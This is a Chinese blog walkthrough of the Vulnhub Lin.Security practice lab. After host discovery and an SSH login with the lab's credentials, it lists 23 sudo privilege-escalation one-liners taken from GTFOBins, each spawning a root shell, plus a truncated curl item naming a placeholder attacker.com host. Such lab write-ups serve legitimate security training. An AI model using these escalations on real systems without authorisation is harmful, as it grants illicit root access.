Vulnhub lin security靶场超全sudo提权

于 2024-07-29 15:27:24 发布
阅读量213 收藏 3
点赞数 5
文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68615160/article/details/140771396
版权

Vulnhub lin security靶场

一、主机发现

arp-scan -l

靶场描述提供了bob用户,密码为secret

二、使用ssh远程连接

ssh bob@192.168.121.173

三、sudo提权

sudo -l

利用三方网站https://gtfobins.github.io/

1.ash

sudo ash

2.awk

sudo awk 'BEGIN {system("/bin/sh")}'

3.bash

sudo bash

4.csh

sudo csh

5.dash

sudo dash

6.curl

URL=http://attacker.com/file_to_get

7.ed

sudo ed
!/bin/sh

8.env

sudo env /bin/sh

9.expect

sudo expect -c 'spawn /bin/sh;interact'

10.find

sudo find . -exec /bin/sh \; -quit

11.ftp

sudo ftp
!/bin/sh

12.less

sudo less /etc/profile
!/bin/sh

13.man

sudo man man
!/bin/sh

14.more

TERM= sudo more /etc/profile
!/bin/sh

15.scp

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

16.socat

sudo socat stdin exec:/bin/sh

17.ssh

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

18.vi

sudo vi -c ':!/bin/sh' /dev/null

19.zsh

sudo zsh

20.pico

sudo pico
^R^X                  #依次Ctrl+R、Ctrl+X
reset; sh 1>&0 2>&0

21.perl

sudo perl -e 'exec "/bin/sh";'

22.tclsh

sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

23.script

sudo script -q /dev/null

橙子iiii
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
in.security 提权靶场通关手册上篇
weixin_47767605的博客
05-17 1493
0x00 in.security靶场介绍 大家好,本期丹丹妹,给大家带来一个Linux 配置问题导致提权靶场通关手册,也就是lin.security靶场lin.security靶场是一个基于Ubuntu(18.04 LTS)的Linux虚拟机,靶场提供许多权限提升的漏洞供我们练习关于linux权限的相关知识,下面是这个靶场的下载链接: https://in.security/downloads/lin.security_v1.0.ova。 这个是一个vmware的ova文件...
sudo提权和普通用户免密切换到root详细笔记
07-02
本笔记将详细讲解如何通过`sudo`进行提权以及设置普通用户免密切换到root的方法。 首先,我们创建一个新的用户`shi`: ```bash [root@www ~]# useradd shi ``` 接着,我们为`shi`用户设置密码: ```bash [root@...
[VulnHub靶机]Lin.Security_linux提权
qq_45927819的博客
03-15 2194
靶机描述 在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 靶机IP:192.168.56.106 直接ssh连接: ssh bob
Vulnhub项目:Lin.SecurityLinux提权大合集)
Ays.Ie的博客
04-17 708
Linux提权大法!
lin.security提权靶场
w2vmany的博客
03-04 205
1.ash查看id发现是最低级的用户再sudo -l查看可以使用的命令我们再提权处理,以使用root权限2.awk。
Lin.Security靶机学习
arcuied
03-20 409
Lin.Security靶场学习
【渗透测试】Lin.Security靶机渗透练习_虚拟机无法获取ip的配置方法+靶机多种提权方式练习
serendipity1130的博客
09-06 1487
靶机描述:在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 环境配置: 1.因为直接开机的security靶机NAT连接,无法
靶机渗透——Lin.Security
qq_45751902的博客
04-28 676
目录靶机描述环境配置一、信息收集二、sudo提权三、crontab定时任务四、敏感隐藏文件五、suid提权六、NFS服务低权限访问 靶机描述 在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/do
liunx提权姿势
梳碧湖的砍柴人
10-05 600
Liunx提权常用
linux信息收集与提权
weixin_74171325的博客
07-09 1187
GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合。切换到普通用户更改文件时的root用户瞬间,因为有的普通用户文件属主为root,是配置不当导致的。有ip了,可以连接ssh了。分配ip,ssh准备连接。
NSudo提权工具最新版
07-24
【NSudo提权工具最新版】是一款用于系统权限提升的实用工具,主要针对Windows操作系统设计。在Windows系统中,通常用户账户的操作权限受到限制,不能对系统关键组件进行修改或执行某些高级操作。这时,NSudo便能发挥...
Linux曝出Sudo提权漏洞 任意用户亦可运行root命令
09-14
最近,一个名为"Sudo提权漏洞"的问题被曝光,这使得任何用户,即使在配置中明确禁止root用户访问,也能在Linux系统上以root权限执行任意命令。 Sudo的工作原理是基于一个名为/etc/sudoers的配置文件,这个文件定义...
sudo提权项目详细笔记文档总结
07-02
sudo 提权项目详细笔记文档总结 本文档总结了sudo 提权项目的详细笔记,包括项目需求、收集员工职能和对应权限、sudo 设置注意事项、模拟创建用户角色实践等方面的知识点。 一、项目需求 sudo 提权项目的主要需求...
sudo提权自动输入密码--java执行交互式命令
05-31
参考了java版的expect4j,expectj的原理,进行了极大的简化,可完成基本的功能: 1,运行java代码,执行交互式命令 2,sudo提权,自动输入密码(echo "password" | sudo -S mkdir /opt/test)
Linux相关指令
最新发布
m0_46502962的博客
07-25 248
其中的-lpthread不是必须的,只有用到该库才输入加上。//该指令将demo.c生成的a.out文件命名为demo8。//将运行结果放到test.ret.txt文件中,没有就创建。1.查看手册 man 3 free。将该运行程序放到后台运行。③(gbd)r 运行。④(gbd)q 退出。
LinuxLinux发展史
weixin_51142926的博客
07-22 4279
大家好!此篇文章并非技术博文,而是简单了解Linux的时代背景和发展史,只有知其所以然才能让我们更好地让走进Liunx的世界!
linux代填密码切换用户
zixuanyankai的博客
07-22 307
linux用户账户密码复杂,在不考虑安全的情况下,想要使用命令自动切换用户。
Linux Vim教程:多文件编辑与窗口管理
07-25 891
Vim作为一款功能强大的文本编辑器,支持多文件编辑和窗口管理。掌握这些高级技巧可以大大提高工作效率和文件处理能力。本文将详细介绍Vim中多文件编辑与窗口管理的各种方法和技巧,包括缓冲区、标签页、分屏、快速切换等。通过这些实用技巧,您可以更高效地在Vim中进行复杂的文本编辑任务。
sudo提权与suid提权的区别
04-08
sudo 和 suid 都是用于提权的工具,但是它们的实现方式和应用场景有所不同。suid 是一种设置权限的机制,用于提高普通用户的权限,使其可以访问一些只有 root 用户才能访问的文件或程序;sudo 则是一种授权机制,通过添加授权文件,允许特定用户以 root 身份运行特定命令,从而避免了多用户之间共享 root 密码的安全风险。希望能对您的问题有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值